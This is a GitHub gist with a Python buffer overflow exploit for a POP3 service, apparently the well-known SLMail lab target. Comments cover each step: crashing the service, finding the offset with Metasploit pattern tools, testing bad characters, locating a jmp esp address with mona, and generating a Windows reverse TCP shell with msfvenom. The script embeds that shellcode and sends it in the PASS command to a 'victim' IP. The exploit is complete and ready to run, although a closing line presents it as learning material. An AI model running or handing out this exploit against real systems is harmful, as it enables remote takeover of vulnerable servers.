Created
October 9, 2017 08:42
-
-
Save abhi3780/9ca5b778a128d6bd259b06efc273b78a to your computer and use it in GitHub Desktop.
Python Script for Buffer_Overflow (BO)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import socket | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
# -------------------1st Step------------------- | |
# Framing similar charecters (say, A) to crash the application | |
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 | |
# buffer = 'A' * 3000 | |
# note down EIP register value and check in pattern_offset | |
# note down the offset value and use it in the script | |
# -------------------2nd Step------------------- | |
# Find the crash point by generating patterns with <pattern_create.rb> | |
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438 | |
# buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9" | |
# Results [*] Exact match at offset 2606 | |
# -------------------3rd Step------------------- | |
# Frame the script (buffer as Variable name) in such a way that it can hold shell code | |
# buffer = 'A' * 2606 + 'B' * 4 + 'C' * (3000-2606-4) | |
# -------------------4th Step------------------- | |
# badcharecters can be downloaded from Internet or can be created using any script uploaded in github | |
# badchar = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10" | |
# "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" | |
# "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" | |
# "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" | |
# "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" | |
# "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" | |
# "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" | |
# "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" | |
# "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" | |
# "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" | |
# "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" | |
# "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" | |
# "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" | |
# "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" | |
# "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" | |
# "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") | |
# buffer = 'A' * 2606 + 'B' * 4 + badchar | |
# -------------------5th Step------------------- | |
# In Immunity Debugger | |
# !mona modules (Search of jmp esp) | |
# Identify the Jump ESP | |
# nasm > jmp esp | |
# Results: 00000000 FFE4 (jmp esp) | |
# In Immunity Debugger | |
# !mona find -s "\xff\xe4" -m slmfc | |
# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb | |
# 5f4a358f (memory allocation pointer) | |
# Reverse the above pointer as "\x8f\x35\x4a\x5f" | |
# Creating shell / Payload | |
# msfvenom -p windows/shell_reverse_tcp LHOST=10.X.X.X LPORT=443 -b "\x00\x0a\x0d" -f c | |
shell = ("\xd9\xc3\xd9\x74\x24\xf4\xba\xa4\x91\xf3\x3c\x5e\x29\xc9\xb1" | |
"\x52\x83\xc6\x04\x31\x56\x13\x03\xf2\x82\x11\xc9\x06\x4c\x57" | |
"\x32\xf6\x8d\x38\xba\x13\xbc\x78\xd8\x50\xef\x48\xaa\x34\x1c" | |
"\x22\xfe\xac\x97\x46\xd7\xc3\x10\xec\x01\xea\xa1\x5d\x71\x6d" | |
"\x22\x9c\xa6\x4d\x1b\x6f\xbb\x8c\x5c\x92\x36\xdc\x35\xd8\xe5" | |
"\xf0\x32\x94\x35\x7b\x08\x38\x3e\x98\xd9\x3b\x6f\x0f\x51\x62" | |
"\xaf\xae\xb6\x1e\xe6\xa8\xdb\x1b\xb0\x43\x2f\xd7\x43\x85\x61" | |
"\x18\xef\xe8\x4d\xeb\xf1\x2d\x69\x14\x84\x47\x89\xa9\x9f\x9c" | |
"\xf3\x75\x15\x06\x53\xfd\x8d\xe2\x65\xd2\x48\x61\x69\x9f\x1f" | |
"\x2d\x6e\x1e\xf3\x46\x8a\xab\xf2\x88\x1a\xef\xd0\x0c\x46\xab" | |
"\x79\x15\x22\x1a\x85\x45\x8d\xc3\x23\x0e\x20\x17\x5e\x4d\x2d" | |
"\xd4\x53\x6d\xad\x72\xe3\x1e\x9f\xdd\x5f\x88\x93\x96\x79\x4f" | |
"\xd3\x8c\x3e\xdf\x2a\x2f\x3f\xf6\xe8\x7b\x6f\x60\xd8\x03\xe4" | |
"\x70\xe5\xd1\xab\x20\x49\x8a\x0b\x90\x29\x7a\xe4\xfa\xa5\xa5" | |
"\x14\x05\x6c\xce\xbf\xfc\xe7\xfb\x34\xfe\x81\x93\x48\xfe\x6c" | |
"\xdf\xc4\x18\x04\x0f\x81\xb3\xb1\xb6\x88\x4f\x23\x36\x07\x2a" | |
"\x63\xbc\xa4\xcb\x2a\x35\xc0\xdf\xdb\xb5\x9f\xbd\x4a\xc9\x35" | |
"\xa9\x11\x58\xd2\x29\x5f\x41\x4d\x7e\x08\xb7\x84\xea\xa4\xee" | |
"\x3e\x08\x35\x76\x78\x88\xe2\x4b\x87\x11\x66\xf7\xa3\x01\xbe" | |
"\xf8\xef\x75\x6e\xaf\xb9\x23\xc8\x19\x08\x9d\x82\xf6\xc2\x49" | |
"\x52\x35\xd5\x0f\x5b\x10\xa3\xef\xea\xcd\xf2\x10\xc2\x99\xf2" | |
"\x69\x3e\x3a\xfc\xa0\xfa\x4a\xb7\xe8\xab\xc2\x1e\x79\xee\x8e" | |
"\xa0\x54\x2d\xb7\x22\x5c\xce\x4c\x3a\x15\xcb\x09\xfc\xc6\xa1" | |
"\x02\x69\xe8\x16\x22\xb8") | |
buffer = 'A' * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 10 + shell | |
# ------------------------------------------------------------------------------------ | |
try: | |
print "\nSending evil buffer..." | |
s.connect(('10.X.X.X',110)) # IP Address of the Victim machine | |
data = s.recv(1024) | |
s.send('USER username' + '\r\n') | |
data = s.recv(1024) | |
s.send('PASS ' + buffer + '\r\n') | |
print "\nDone..!!" | |
except: | |
print "Could not connect to POP3..!" | |
# --------------------THE END----------------- | |
# -----------------HAPPY LEARNING------------- |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment